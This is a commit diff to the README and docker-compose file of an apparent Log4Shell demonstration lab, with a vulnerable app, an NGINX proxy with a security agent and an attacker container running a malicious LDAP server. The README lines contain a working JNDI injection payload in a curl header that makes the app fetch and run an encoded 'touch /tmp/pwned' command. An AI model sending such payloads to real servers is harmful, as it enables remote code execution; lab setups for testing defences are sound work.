modified README

christiancastilloporras · Jan 15, 2022 · dd25975 · dd25975
1 parent c56fa4c
commit dd25975
Show file tree

Hide file tree

Showing 2 changed files with 4 additions and 4 deletions.
diff --git a/README.md b/README.md
@@ -4,16 +4,16 @@
  It will deploy 4 containers, an NGINX reverse proxy, an agent-container (the nano-agent), Log4J vulnerable App and Attacker with malicious LDAP.
  The LDAP malicious server is builded at moment the creation.
 
-You will reach all the Vulnerable application with the exposed 8080 port from the NGINX server, the default.conf file already redirects all the request to the app.
+You will reach all the Vulnerable application with the exposed 80 port from the NGINX server, the default.conf file already redirects all the request to the app.
 
 ## Instructions:
 
 * Clone the repository
 * From a machine with docker and docker-compose installed, run:  
 `  export TOKEN=<your agent token>`  
 `  docker-compose up `  
-`  from another machine run "curl "docker host ip address":8080" and if you recieve "status":400,"error":"Bad Request","path":"/" as response, the server is properly listening`
-`  from the same machine now run "curl "docker host ip address":8080 -H 'X-Api-Version: ${jndi:ldap://malicious:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'" this last request inject the LDAP call in the log and the Log4J vulnerable dependency try to execute it, connecting to the malicious server and executing a "touch /tmp/pwned" command`
+`  from another machine run "curl "http://docker host ip address"" and if you recieve "status":400,"error":"Bad Request","path":"/" as response, the server is properly listening`
+`  from the same machine now run "curl "http://docker host ip address":8080 -H 'X-Api-Version: ${jndi:ldap://malicious:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'" this last request inject the LDAP call in the log and the Log4J vulnerable dependency try to execute it, connecting to the malicious server and executing a "touch /tmp/pwned" command`
 `  in the docker host we can run "docker ps" and look for a container with the name log4shell-log4shell grab the ID and run "docker logs -f "ID of container"" you will see the logs of the server when executes the command`
 `  in the docker host again we can run with the same container ID 'docker exec "ID of container" ls /tmp/' and you will see the file created by the attack`
 `  docker-compose down `  

diff --git a/docker-compose.yaml b/docker-compose.yaml
@@ -10,7 +10,7 @@ services:
     links:
       - "log4shell:web"
     ports:
-      - 8080:80
+      - 80:80
     ipc: host
     image: checkpoint/infinity-next-nginx
     volumes: